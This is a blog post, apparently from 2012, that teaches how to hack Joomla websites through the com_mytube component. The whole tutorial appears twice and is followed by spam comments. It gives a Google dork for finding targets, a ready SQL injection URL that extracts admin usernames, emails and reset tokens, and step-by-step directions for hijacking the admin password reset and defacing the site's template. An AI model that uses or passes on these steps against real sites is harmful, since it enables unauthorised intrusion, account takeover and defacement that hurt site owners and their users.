6/12/2012 12:37:00 pm
ABHIJEET VISHEN
Hacking Joomla Website
Hey all today i will tell you all how to hack joomla websites.Ok so thereare are different ways to hack a Joomla based website ...But today i will tell you all one of the finest way to hack Joomla websites.
Introduction To Joomla
Joomla as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish___!!!!!!!
But people still hacked sites that use Joomla as Content Management System?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules made by that other developers are weak spots and thus make it vulnerable and hackable.
Finding Exploit and Target
First Of all you input this
Google Dork :
inurl:"option=com_mytube"
enter this dork in Google search box...
Next is injecting the target
See for this URL:
http://targetsite.com/index.php?option=com_mytube&Itemid=88...
Now You have to replace the url something like below
http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
If our target site is vulnerable then we can see something like below image
In above image we can see username, email and activation code.
Now let this page opened and open new page.
Admin password reset
Go to:
http://www.targetsite.com/index.php?option=com_user&view=reset
This is standard Joomla query for password reset request
Ok now type the email adress found in above steps and submit it
The activation code should be resetted.
Return to the first page, refresh the page and take the new activation code.
Paste him in the token and press Submit.
problem with token_______!!!!!!
UPDATE: Joomla! 1.5.16 now hashes the reset token
if you see a thing like :$1$14411: after the activation code, it will not work.
Admin Login
If you done everything ok, your Password page will load. Enter your new password...
After that go to:
http://www.targetsite.com/administrator/
Standard Joomla portal content management system
Enter the username and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
Now you are successfully done.
Introduction To Joomla
Joomla as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish___!!!!!!!
But people still hacked sites that use Joomla as Content Management System?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules made by that other developers are weak spots and thus make it vulnerable and hackable.
Finding Exploit and Target
First Of all you input this
Google Dork :
inurl:"option=com_mytube"
enter this dork in Google search box...
Next is injecting the target
See for this URL:
http://targetsite.com/index.php?option=com_mytube&Itemid=88...
Now You have to replace the url something like below
http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
If our target site is vulnerable then we can see something like below image
In above image we can see username, email and activation code.
Now let this page opened and open new page.
Admin password reset
Go to:
http://www.targetsite.com/index.php?option=com_user&view=reset
This is standard Joomla query for password reset request
Ok now type the email adress found in above steps and submit it
The activation code should be resetted.
Return to the first page, refresh the page and take the new activation code.
Paste him in the token and press Submit.
problem with token_______!!!!!!
UPDATE: Joomla! 1.5.16 now hashes the reset token
if you see a thing like :$1$14411: after the activation code, it will not work.
Admin Login
If you done everything ok, your Password page will load. Enter your new password...
After that go to:
http://www.targetsite.com/administrator/
Standard Joomla portal content management system
Enter the username and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
Now you are successfully done.
Posted in: HACKING
7 comments:
One of the best features of Joomla for many companies is access to thousands of customizable extensions.
Web Designing Bangalore | Website Development Company Bangalore
I can not believes in this information of this blog to hack the Joomla websites.Is this really working to hack the websites???
Top Web Design Company | Website Development Company
Magento is the leading open source e-commerce software platform mostly trusted by developers. For effective web design to deliver excellent website for customer
Website Designing Company Bangalore | Website Development Company Bangalore
Its very difficult to hack the joomla website.Because it is more securable development platform.
Web Design Companies | Website Design Companies
I think hacking the joomla website is very difficult.Because it have more securable things and functionality.
Responsive Web Design Company | Responsive Design Companies
Hacking zoomla is difficult but not so difficult We are a team of highly experienced team members who mainly designs websites , application and analyze vulnerabilities for any assistance regarding web development , software development , application development , content writing , seo visit www.wavemaza.com
What can be so difficult about Joomla, they said. You’ve already worked with WordPress, they said.
I was like: “Okay, I’ll do the one-click install like a boss and get everything set-up in no time.” Web Design Bangalore
Post a Comment